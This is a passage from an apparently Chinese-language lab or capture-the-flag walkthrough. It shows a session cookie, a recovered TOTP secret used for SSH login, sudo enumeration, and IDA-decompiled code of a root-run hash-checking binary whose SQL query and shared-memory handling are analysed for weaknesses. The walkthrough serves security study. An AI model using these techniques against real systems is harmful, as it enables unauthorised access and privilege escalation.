\"Content-Type\":\"application\/x-www-form-urlencoded\",\"Cookie\":\"bookstack_session=eyJpdiI6IjJIWW9qL2tnclYyL0dndHF2NExPM1E9PSIsInZhbHVlIjoidVJVZzdmRThIa013bTAvaUx5bVdLNC9reGM4aDEwRFVZVkZ6QzA3aUV1WXFab0c0ZFhrcjFRMXB6SmlML1dDQW00UVRFVXNldEs2WlNQejEwN1pYSlh6djRLbkhmeXk3NisyaFBEZTQ2eUk4ejl2dEVGb2toZFNFUFAvay9KYlAiLCJtYWMiOiJlNGZkZjczMTIzOGM4ZjMyMmExMDI0ODllNjZmZjdlZmQ1NDg4ZmRlMjI0OWNjZGZkMWMwMWJhMWUyMjk5ODRmIiwidGFnIjoiIn0%3D\"}'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740546176020-9f881a17-d3f2-4b74-a5ec-cab37b153fdf.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>Google Authenticator TOTP<\/code>\u9a8c\u8bc1\u7801\u751f\u6210\u5bc6\u94a5\uff1a<code>DVDBRAODLCWF7I2ONA4K5LQLUE<\/code>\u3002<\/p>\n<p>\u63a5\u4e0b\u6765\u6253\u5f00\u5728\u7ebf\u5de5\u5177\uff0c\u8f93\u5165\u5bc6\u94a5\u70b9\u51fb\u751f\u6210\u6309\u94ae\uff0c\u7f16\u7801\u683c\u5f0f\u9009\u62e9<code>Base32<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740546954125-2d92e52a-4bd8-4c2a-aba4-5e6f86085c64.png\" alt=\"\" \/><\/p>\n<p>\u63a5\u7740\u76f4\u63a5\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740547150423-4d622c17-66c8-4cf1-9ce0-5a59795414db.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u9006\u5411\u5206\u6790check_leak\u7a0b\u5e8f<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u6267\u884c<code>sudo -l<\/code>\u547d\u4ee4\uff0c\u53d1\u73b0\u5f53\u524d\u7528\u6237<code>reader<\/code>\u53ef\u4ee5<code>root<\/code>\u8eab\u4efd\u514d\u5bc6\u8fd0\u884c<code>\/opt\/hash-checker\/check-leak.sh<\/code>\u547d\u4ee4\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740547365450-742dec0e-4361-4d9a-bd84-4db2abe855d0.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u8be5\u811a\u672c\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nsource `dirname $0`\/.env\nUSER_NAME=$(\/usr\/bin\/echo \"$1\" | \/usr\/bin\/tr -dc '[:alnum:]')\n\/opt\/hash-checker\/check_leak \"$USER_NAME\"<\/code><\/pre>\n<p>\u53d1\u73b0\u8be5\u811a\u672c\u4f1a\u76f4\u63a5\u8c03\u7528<code>\/opt\/hash-checker\/check_leak<\/code>\u7a0b\u5e8f\u3002\u76f4\u63a5\u4f7f\u7528<code>scp<\/code>\u5c06\u5176\u4f20\u8f93\u5230\u672c\u5730\uff0c\u4f7f\u7528<code>IDA Pro<\/code>\u6253\u5f00\uff0c\u627e\u5230<code>main()<\/code>\u51fd\u6570\u540e\u6309<code>F5<\/code>\u67e5\u770b\u5176\u6a21\u62df\u4ee3\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740547681966-3b68b035-5af6-460d-b838-d851aed63ac1.png\" alt=\"\" \/><\/p>\n<p>\u7531\u4e8e\u9006\u5411\u5de5\u7a0b\u5206\u6790\u9700\u8981\uff0c\u4f5c\u8005\u5df2\u7ecf\u5c06\u6a21\u62df\u4ee3\u7801\u53d8\u91cf\u8fdb\u884c\u4e86\u91cd\u547d\u540d\uff0c\u4e0b\u9762\u8d34\u51fa<code>main()<\/code>\u51fd\u6570\u6a21\u62df\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-c\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  const char *v3; \/\/ rdx\n  unsigned int shm_location; \/\/ [rsp+14h] [rbp-3Ch]\n  char *db_host; \/\/ [rsp+18h] [rbp-38h]\n  char *db_user; \/\/ [rsp+20h] [rbp-30h]\n  char *db_pass; \/\/ [rsp+28h] [rbp-28h]\n  char *db_name; \/\/ [rsp+30h] [rbp-20h]\n  char *username_input; \/\/ [rsp+40h] [rbp-10h]\n  void *ptr; \/\/ [rsp+48h] [rbp-8h]\n\n  db_host = getenv(\"DB_HOST\");\n  db_user = getenv(\"DB_USER\");\n  db_pass = getenv(\"DB_PASSWORD\");\n  db_name = getenv(\"DB_NAME\");\n  if ( *(_BYTE *)(((unsigned __int64)(argv + 1) &gt;&gt; 3) + 0x7FFF8000) )\n    __asan_report_load8(argv + 1);\n  username_input = (char *)argv[1];\n  if ( !db_host || !db_user || !db_pass || !db_name )\/\/ Check if MySQL credential not exists\n  {\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fwrite(\"Error: Missing database credentials in environmentn\", 1uLL, 0x33uLL, stderr);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  if ( argc != 2 )                              \/\/ Throw error if the command arguments are less than 2\n  {\n    if ( *(_BYTE *)(((unsigned __int64)argv &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(argv);\n    v3 = *argv;\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(stderr, \"Usage: %s &lt;USER&gt;n\", v3);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  if ( !username_input )\n    goto ERROR_EMPTY_USERNAME;\n  if ( *(_BYTE *)(((unsigned __int64)username_input &gt;&gt; 3) + 0x7FFF8000) != 0\n    &amp;&amp; ((unsigned __int8)username_input &amp; 7) &gt;= *(_BYTE *)(((unsigned __int64)username_input &gt;&gt; 3) + 0x7FFF8000) )\n  {\n    __asan_report_load1(username_input);\n  }\n  if ( !*username_input )\n  {\nERROR_EMPTY_USERNAME:\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fwrite(\"Error: &lt;USER&gt; is not provided.n\", 1uLL, 0x1FuLL, stderr);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  if ( strlen(username_input) &gt; 20 )            \/\/ Throw error if the username's length is longer than 20\n  {\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fwrite(\"Error: &lt;USER&gt; is too long. Maximum length is 20 characters.n\", 1uLL, 0x3CuLL, stderr);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  ptr = (void *)fetch_hash_from_db(db_host, db_user, db_pass, db_name, username_input);\n  if ( ptr )\n  {\n    if ( (unsigned __int8)check_bcrypt_in_file(\"\/opt\/hash-checker\/leaked_hashes.txt\", ptr) )\n    {\n      puts(\"Password is leaked!\");\n      if ( *(_BYTE *)(((unsigned __int64)&amp;edata &gt;&gt; 3) + 0x7FFF8000) )\n        __asan_report_load8(&amp;edata);\n      fflush(edata);\n      shm_location = write_to_shm(ptr);\n      printf(\"Using the shared memory 0x%X as temp locationn\", shm_location);\n      if ( *(_BYTE *)(((unsigned __int64)&amp;edata &gt;&gt; 3) + 0x7FFF8000) )\n        __asan_report_load8(&amp;edata);\n      fflush(edata);\n      sleep(1u);\n      notify_user(db_host, db_user, db_pass, db_name, shm_location);\n      clear_shared_memory(shm_location);\n    }\n    else\n    {\n      puts(\"User is safe.\");\n    }\n    free(ptr);\n  }\n  else\n  {\n    puts(\"User not found in the database.\");\n  }\n  return 0;\n}<\/code><\/pre>\n<p>\u6211\u4eec\u9996\u5148\u6765\u5206\u6790<code>main()<\/code>\u4e3b\u7a0b\u5e8f\u51fd\u6570\u3002\u5728\u521d\u59cb\u5316\u9636\u6bb5\uff0c\u7a0b\u5e8f\u4ece\u73af\u5883\u53d8\u91cf\u8bfb\u5165\u4e86<code>db_host<\/code>\u3001<code>db_user<\/code>\u3001<code>db_pass<\/code>\u548c<code>db_name<\/code>\u56db\u4e2a<code>MySQL<\/code>\u6570\u636e\u5e93\u8fde\u63a5\u914d\u7f6e\uff0c\u4ee5\u53ca\u4ece\u547d\u4ee4\u884c\u8f93\u5165\u8bfb\u5165\u4e86\u7528\u6237\u540d\uff0c\u5b58\u5728<code>username_input<\/code>\u5185\uff0c\u63a5\u7740\u8fdb\u884c\u4e86\u68c0\u6d4b\u8fde\u63a5\u51ed\u636e\u4e0e\u8f93\u5165\u7528\u6237\u540d\u662f\u5426\u4e3a\u7a7a\u7b49\u4e00\u7cfb\u5217\u64cd\u4f5c\uff0c\u8303\u56f4\u5728<code>12 - 61<\/code>\u884c\u3002<\/p>\n<p>\u7d27\u63a5\u7740\uff0c\u7a0b\u5e8f\u8c03\u7528\u4e86<code>fetch_hash_from_db<\/code>\u51fd\u6570\uff0c\u5c06\u6570\u636e\u5e93\u51ed\u636e\u548c\u8f93\u5165\u7528\u6237\u540d\u5168\u90e8\u4f20\u5165\u4e86\u8fdb\u53bb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740548342655-bc5149ea-28b3-41b0-a793-3956035b91c6.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u53cc\u51fb\u8be5\u51fd\u6570\uff0c\u67e5\u770b\u5176\u6a21\u62df\u4ee3\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740548447836-595fb399-8531-4b72-810f-06b6ade2a59a.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-c\">char *__fastcall fetch_hash_from_db(\n        __int64 db_host,\n        __int64 db_user,\n        __int64 db_pass,\n        __int64 db_name,\n        const char *username)\n{\n  unsigned __int64 buffer; \/\/ rbx\n  __int64 v6; \/\/ rax\n  _DWORD *v7; \/\/ r12\n  const char *mysql_error_init_message; \/\/ rcx\n  const char *mysql_error_connect_message; \/\/ rcx\n  const char *mysql_error_query_message; \/\/ rcx\n  const char *mysql_error_savedata_message; \/\/ rcx\n  size_t each_result_length; \/\/ rax\n  char *dest; \/\/ [rsp+30h] [rbp-500h]\n  __int64 mysql_conn; \/\/ [rsp+38h] [rbp-4F8h]\n  __int64 db_query_result; \/\/ [rsp+40h] [rbp-4F0h]\n  unsigned __int64 row; \/\/ [rsp+48h] [rbp-4E8h]\n  char v21[1208]; \/\/ [rsp+50h] [rbp-4E0h] BYREF\n  unsigned __int64 v22; \/\/ [rsp+508h] [rbp-28h]\n\n  buffer = (unsigned __int64)v21;\n  if ( _asan_option_detect_stack_use_after_return )\n  {\n    v6 = __asan_stack_malloc_5(1184LL);\n    if ( v6 )\n      buffer = v6;\n  }\n  *(_QWORD *)buffer = 1102416563LL;\n  *(_QWORD *)(buffer + 8) = \"1 32 1024 8 query:36\";\n  *(_QWORD *)(buffer + 16) = fetch_hash_from_db;\n  v7 = (_DWORD *)(buffer &gt;&gt; 3);\n  v7[536862720] = -235802127;\n  v7[536862753] = -202116109;\n  v7[536862754] = -202116109;\n  v7[536862755] = -202116109;\n  v7[536862756] = -202116109;\n  v22 = __readfsqword(40u);\n  mysql_conn = mysql_init(0LL);\n  if ( !mysql_conn )\n  {\n    mysql_error_init_message = (const char *)mysql_error(0LL);\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(stderr, \"Error: %sn\", mysql_error_init_message);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  if ( !mysql_real_connect(mysql_conn, db_host, db_user, db_pass, db_name, 0LL, 0LL, 0LL) )\n  {\n    mysql_error_connect_message = (const char *)mysql_error(mysql_conn);\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(stderr, \"Error: %sn\", mysql_error_connect_message);\n    mysql_close(mysql_conn);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  snprintf((char *)(buffer + 32), 0x400uLL, \"SELECT pw FROM teampass_users WHERE login = '%s';\", username);\n  if ( (unsigned int)mysql_query(mysql_conn, buffer + 32) )\n  {\n    mysql_error_query_message = (const char *)mysql_error(mysql_conn);\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(stderr, \"Error: %sn\", mysql_error_query_message);\n    mysql_close(mysql_conn);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  db_query_result = mysql_store_result(mysql_conn);\n  if ( !db_query_result )\n  {\n    mysql_error_savedata_message = (const char *)mysql_error(mysql_conn);\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(stderr, \"Error storing result: %sn\", mysql_error_savedata_message);\n    mysql_close(mysql_conn);\n    __asan_handle_no_return();\n    exit(1);\n  }\n  dest = 0LL;\n  row = mysql_fetch_row(db_query_result);\n  if ( row )\n  {\n    if ( *(_BYTE *)((row &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(row);\n    if ( *(_QWORD *)row )\n    {\n      each_result_length = strlen(*(const char **)row);\n      dest = (char *)malloc(each_result_length + 1);\n      if ( !dest )\n      {\n        if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n          __asan_report_load8(&amp;stderr);\n        fwrite(\"Memory allocation error.n\", 1uLL, 0x19uLL, stderr);\n        mysql_free_result(db_query_result);\n        mysql_close(mysql_conn);\n        __asan_handle_no_return();\n        exit(1);\n      }\n      if ( *(_BYTE *)((row &gt;&gt; 3) + 0x7FFF8000) )\n        __asan_report_load8(row);\n      strcpy(dest, *(const char **)row);\n    }\n  }\n  else\n  {\n    dest = 0LL;\n  }\n  mysql_free_result(db_query_result);\n  mysql_close(mysql_conn);\n  if ( v21 == (char *)buffer )\n  {\n    *(_DWORD *)((buffer &gt;&gt; 3) + 0x7FFF8000) = 0;\n    *(_QWORD *)((buffer &gt;&gt; 3) + 0x7FFF8084) = 0LL;\n    *(_QWORD *)((buffer &gt;&gt; 3) + 0x7FFF808C) = 0LL;\n  }\n  else\n  {\n    *(_QWORD *)buffer = 1172321806LL;\n    __asan_stack_free_5(buffer, 1184LL, v21);\n  }\n  return dest;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\u8be5\u51fd\u6570\u7684\u4f5c\u7528\u662f\u767b\u5f55\u6570\u636e\u5e93\u5e76\u67e5\u51fa\u6307\u5b9a\u7528\u6237\u7684\u54c8\u5e0c\u503c\u3002\u51fd\u6570\u5728\u7b2c<code>23 - 59<\/code>\u884c\u8fdb\u884c\u4e86\u4e00\u7cfb\u5217\u6570\u636e\u5e93\u521d\u59cb\u5316\u64cd\u4f5c\uff0c\u968f\u540e\u5728\u7b2c<code>60 - 81<\/code>\u884c\u8fdb\u884c\u4e86\u6570\u636e\u5e93\u67e5\u8be2\u548c\u7ed3\u679c\u4fdd\u5b58\u3002\u9996\u5148\u53ef\u4ee5\u53d1\u73b0\uff0c\u67e5\u8be2\u7684<code>SQL<\/code>\u8bed\u53e5\u4e3a\uff1a<\/p>\n<pre><code class=\"language-plsql\">SELECT pw FROM teampass_users WHERE login = '{USERNAME}';<\/code><\/pre>\n<p>\u5f88\u663e\u7136\uff0c\u7a0b\u5e8f\u67e5\u8be2\u7684\u662f<code>Teampass<\/code>\u7684\u7528\u6237\u54c8\u5e0c\uff0c\u800c\u4e4b\u524d\u5728\u6e17\u900f\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0<code>admin<\/code>\u548c<code>bob<\/code>\u7528\u6237\u7684\u54c8\u5e0c\u521a\u597d\u53d1\u751f\u6cc4\u9732\u3002<\/p>\n<p>\u968f\u540e\uff0c\u5728\u7b2c<code>82 - 110<\/code>\u884c\uff0c\u7a0b\u5e8f\u521b\u5efa\u4e86<code>dest<\/code>\u53d8\u91cf\uff0c\u4f7f\u7528<code>mysql_fetch_row<\/code>\u51fd\u6570\u5c06\u54c8\u5e0c\u503c\u4fdd\u5b58\u5230\u4e34\u65f6\u53d8\u91cf\u5185\uff0c\u63a5\u7740\u6839\u636e\u5176\u5b57\u7b26\u4e32\u957f\u5ea6\uff0c\u4f7f\u7528<code>malloc()<\/code>\u51fd\u6570\u52a8\u6001\u5206\u914d\u4e86\u5185\u5b58\u7a7a\u95f4\uff0c\u5c06\u5176\u6307\u9488\u8d4b\u503c\u7ed9<code>dest<\/code>\u53d8\u91cf\uff0c\u6700\u540e\u5c06\u4e34\u65f6\u53d8\u91cf\u4e2d\u7684\u5185\u5bb9\u4f7f\u7528<code>strcpy<\/code>\u51fd\u6570\u590d\u5236\u5230\u4e86<code>dest<\/code>\u53d8\u91cf\u4e2d\u3002\u5728\u8be5\u51fd\u6570\u672b\u5c3e\uff0c\u4f7f\u7528<code>return<\/code>\u8fd4\u56de\u4e86<code>dest<\/code>\u53d8\u91cf\u3002<\/p>\n<p>\u7531\u6b64\u53ef\u5f97\u5230\u603b\u7ed3\uff1a<code>fetch_hash_from_db<\/code>\u662f\u6839\u636e\u8f93\u5165\u7528\u6237\u540d\u5411\u6570\u636e\u5e93\u67e5\u8be2\u5176\u54c8\u5e0c\u7684\u51fd\u6570\u3002<\/p>\n<p>\u7ee7\u7eed\u770b<code>main()<\/code>\u51fd\u6570\u3002\u5f53<code>fetch_hash_from_db<\/code>\u51fd\u6570\u6267\u884c\u5b8c\u6bd5\u540e\uff0c\u7a0b\u5e8f\u4f1a\u5224\u65ad\u5176\u8fd4\u56de\u503c\u53d8\u91cf<code>ptr<\/code>\u662f\u5426\u4e3a<code>NULL<\/code>\u3002\u5982\u679c\u4e0d\u4e3a<code>NULL<\/code>\uff0c\u7a0b\u5e8f\u53c8\u4f1a\u8c03\u7528<code>check_bcrypt_in_file<\/code>\u51fd\u6570\uff0c\u4f3c\u4e4e\u662f\u5c06\u8fd4\u56de\u7684\u54c8\u5e0c\u503c\u540c<code>\/opt\/hash-checker\/leaked_hashes.txt<\/code>\u5185\u4fdd\u5b58\u7684\u54c8\u5e0c\u4f5c\u9010\u884c\u6bd4\u8f83\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740549611922-c5e42eef-51af-4f2a-a6ac-0c871cdc39c1.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-c\">__int64 __fastcall check_bcrypt_in_file(const char *file_path, const char *result_ptr)\n{\n  unsigned __int64 filedata_buffer; \/\/ rbx\n  __int64 v3; \/\/ rax\n  char *v4; \/\/ r13\n  _DWORD *v5; \/\/ r12\n  __int64 result; \/\/ rax\n  size_t v7; \/\/ rcx\n  char v8; \/\/ dl\n  size_t v9; \/\/ rcx\n  char v10; \/\/ dl\n  FILE *stream; \/\/ [rsp+10h] [rbp-1B0h]\n  size_t bcrypt_hashfile_length; \/\/ [rsp+18h] [rbp-1A8h]\n  char v13[376]; \/\/ [rsp+20h] [rbp-1A0h] BYREF\n  unsigned __int64 v14; \/\/ [rsp+198h] [rbp-28h]\n\n  filedata_buffer = (unsigned __int64)v13;\n  if ( _asan_option_detect_stack_use_after_return )\n  {\n    v3 = __asan_stack_malloc_3(352LL);\n    if ( v3 )\n      filedata_buffer = v3;\n  }\n  v4 = (char *)(filedata_buffer + 384);\n  *(_QWORD *)filedata_buffer = 1102416563LL;\n  *(_QWORD *)(filedata_buffer + 8) = \"1 32 256 7 line:76\";\n  *(_QWORD *)(filedata_buffer + 16) = check_bcrypt_in_file;\n  v5 = (_DWORD *)(filedata_buffer &gt;&gt; 3);\n  v5[536862720] = -235802127;\n  v5[536862729] = -202116109;\n  v5[536862730] = -202116109;\n  v14 = __readfsqword(0x28u);\n  stream = fopen(file_path, \"r\");\n  if ( stream )\n  {\n    while ( fgets((char *)(filedata_buffer + 32), 256, stream) )\n    {\n      bcrypt_hashfile_length = strlen((const char *)(filedata_buffer + 32));\n      if ( bcrypt_hashfile_length )\n      {\n        v7 = bcrypt_hashfile_length - 1;\n        v8 = *(_BYTE *)(((bcrypt_hashfile_length - 1 + filedata_buffer + 32) &gt;&gt; 3) + 0x7FFF8000);\n        if ( v8 != 0 &amp;&amp; (char)((bcrypt_hashfile_length - 1 + filedata_buffer + 32) &amp; 7) &gt;= v8 )\n          __asan_report_load1(bcrypt_hashfile_length - 1 + filedata_buffer + 32);\n        if ( v4[v7 - 352] == 10 )\n        {\n          v9 = bcrypt_hashfile_length - 1;\n          v10 = *(_BYTE *)(((bcrypt_hashfile_length - 1 + filedata_buffer + 32) &gt;&gt; 3) + 0x7FFF8000);\n          if ( v10 != 0 &amp;&amp; (char)((bcrypt_hashfile_length - 1 + filedata_buffer + 32) &amp; 7) &gt;= v10 )\n            __asan_report_store1(bcrypt_hashfile_length - 1 + filedata_buffer + 32);\n          v4[v9 - 352] = 0;\n        }\n      }\n      if ( !strcmp((const char *)(filedata_buffer + 32), result_ptr) )\n      {\n        fclose(stream);\n        LODWORD(result) = 1;\n        goto LABEL_17;\n      }\n    }\n    fclose(stream);\n    LODWORD(result) = 0;\n  }\n  else\n  {\n    perror(\"Error opening file\");\n    LODWORD(result) = 0;\n  }\nLABEL_17:\n  if ( v13 == (char *)filedata_buffer )\n  {\n    *(_DWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8000) = 0;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8024) = 0LL;\n  }\n  else\n  {\n    *(_QWORD *)filedata_buffer = 1172321806LL;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8000) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8008) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8010) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8018) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8020) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_DWORD *)((filedata_buffer &gt;&gt; 3) + 0x7FFF8028) = -168430091;\n    **(_BYTE **)(filedata_buffer + 504) = 0;\n  }\n  return (unsigned int)result;\n}<\/code><\/pre>\n<p>\u8be5\u51fd\u6570\u7684\u6838\u5fc3\u5728\u7b2c<code>54 - 59<\/code>\u884c\u3002\u5728\u7b2c<code>36<\/code>\u884c\uff0c\u51fd\u6570\u901a\u8fc7<code>fgets()<\/code>\u65b9\u6cd5\u548c<code>while<\/code>\u5faa\u73af\uff0c\u5b9e\u73b0\u4e86\u6bcf\u6b21\u8bfb\u53d6\u4e00\u884c\u6587\u4ef6\u5185\u5bb9\u5230<code>filedata_buffer<\/code>\u7684\u529f\u80fd\uff08\u54c8\u5e0c\u503c\u5f00\u5934\u7d22\u5f15\u5728\u6570\u7ec4\u7b2c<code>32<\/code>\u4f4d\uff09\u3002\u968f\u540e\uff0c\u5728\u7b2c<code>54 - 59<\/code>\u884c\uff0c\u7a0b\u5e8f\u4f7f\u7528<code>strcmp<\/code>\u51fd\u6570\u5c06\u4f20\u5165\u54c8\u5e0c\u503c\u548c<code>filedata_buffer<\/code>\u5185\u4fdd\u5b58\u7684\u6b63\u786e\u54c8\u5e0c\u503c\u8fdb\u884c\u4e86\u6bd4\u8f83\uff0c\u5982\u5185\u5bb9\u76f8\u7b26\uff0c\u5219\u8fd4\u56de<code>True<\/code>\u3002<\/p>\n<p>\u7ee7\u7eed\u8fd4\u56de\u770b<code>main()<\/code>\u51fd\u6570\u3002\u5f53<code>check_bcrypt_in_file<\/code>\u51fd\u6570\u6267\u884c\u5b8c\u6bd5\uff0c\u4e14\u4f20\u5165\u54c8\u5e0c\u548c\u6b63\u786e\u54c8\u5e0c\u76f8\u5339\u914d\u65f6\uff0c\u7a0b\u5e8f\u4f1a\u6253\u5370\u5bc6\u7801\u6cc4\u9732\u7684\u63d0\u793a\uff0c\u5e76\u8c03\u7528<code>write_to_shm()<\/code>\u51fd\u6570\u3002\u4ece\u4e0b\u9762<code>printf()<\/code>\u51fd\u6570\u6253\u5370\u7684\u5185\u5bb9\u6765\u770b\uff0c\u8be5\u51fd\u6570\u4f3c\u4e4e\u662f\u5c06\u54c8\u5e0c\u503c\u5185\u5bb9\u5199\u5165\u4e86<code>Linux<\/code>\u5171\u4eab\u7a7a\u95f4\u5185\u3002\u67e5\u770b\u8be5\u51fd\u6570\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740550852218-d7eb2405-8eae-45cb-b521-778227b92d3c.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-c\">__int64 __fastcall write_to_shm(const char *dbhash_ptr)\n{\n  unsigned __int64 v1; \/\/ rbx\n  __int64 v2; \/\/ rax\n  unsigned __int64 v3; \/\/ r12\n  unsigned int current_timestamp_1; \/\/ eax\n  time_t current_timestamp_2; \/\/ rax\n  unsigned __int64 current_time_string_lastchar; \/\/ rcx\n  unsigned int key; \/\/ [rsp+10h] [rbp-A0h]\n  int shmid; \/\/ [rsp+14h] [rbp-9Ch]\n  char *share_memory_ptr; \/\/ [rsp+20h] [rbp-90h]\n  const char *current_time_string; \/\/ [rsp+28h] [rbp-88h]\n  char v12[88]; \/\/ [rsp+30h] [rbp-80h] BYREF\n  unsigned __int64 v13; \/\/ [rsp+88h] [rbp-28h]\n\n  v1 = (unsigned __int64)v12;\n  if ( _asan_option_detect_stack_use_after_return )\n  {\n    v2 = __asan_stack_malloc_0(64LL);\n    if ( v2 )\n      v1 = v2;\n  }\n  *(_QWORD *)v1 = 1102416563LL;\n  *(_QWORD *)(v1 + 8) = \"1 32 8 7 now:105\";\n  *(_QWORD *)(v1 + 16) = write_to_shm;\n  v3 = v1 &gt;&gt; 3;\n  *(_DWORD *)(v3 + 2147450880) = -235802127;\n  *(_DWORD *)(v3 + 2147450884) = -202116352;\n  v13 = __readfsqword(0x28u);\n  current_timestamp_1 = time(0LL);\n  srand(current_timestamp_1);\n  key = rand() % 0xFFFFF;\n  shmid = shmget(key, 0x400uLL, 950);\n  if ( shmid == -1 )\n  {\n    perror(\"shmget\");\n    __asan_handle_no_return();\n    exit(1);\n  }\n  share_memory_ptr = (char *)shmat(shmid, 0LL, 0);\n  if ( share_memory_ptr == (char *)-1LL )\n  {\n    perror(\"shmat\");\n    __asan_handle_no_return();\n    exit(1);\n  }\n  current_timestamp_2 = time(0LL);\n  if ( *(_BYTE *)(((v1 + 32) &gt;&gt; 3) + 0x7FFF8000) )\n    current_timestamp_2 = __asan_report_store8(v1 + 32);\n  *(_QWORD *)(v1 + 32) = current_timestamp_2;\n  current_time_string = ctime((const time_t *)(v1 + 32));\n  current_time_string_lastchar = (unsigned __int64)&amp;current_time_string[strlen(current_time_string) - 1];\n  if ( *(_BYTE *)((current_time_string_lastchar &gt;&gt; 3) + 0x7FFF8000) != 0\n    &amp;&amp; (char)(current_time_string_lastchar &amp; 7) &gt;= *(_BYTE *)((current_time_string_lastchar &gt;&gt; 3) + 0x7FFF8000) )\n  {\n    __asan_report_store1(current_time_string_lastchar);\n  }\n  *(_BYTE *)current_time_string_lastchar = 0;\n  snprintf(share_memory_ptr, 0x400uLL, \"Leaked hash detected at %s &gt; %sn\", current_time_string, dbhash_ptr);\n  shmdt(share_memory_ptr);\n  if ( v12 == (char *)v1 )\n  {\n    *(_QWORD *)((v1 &gt;&gt; 3) + 0x7FFF8000) = 0LL;\n  }\n  else\n  {\n    *(_QWORD *)v1 = 1172321806LL;\n    *(_QWORD *)((v1 &gt;&gt; 3) + 0x7FFF8000) = 0xF5F5F5F5F5F5F5F5LL;\n    **(_BYTE **)(v1 + 56) = 0;\n  }\n  return key;\n}<\/code><\/pre>\n<p>\u8be5\u51fd\u6570\u7684\u91cd\u70b9\u5728\u7b2c<code>30 - 33<\/code>\u884c\u548c\u7b2c<code>47 - 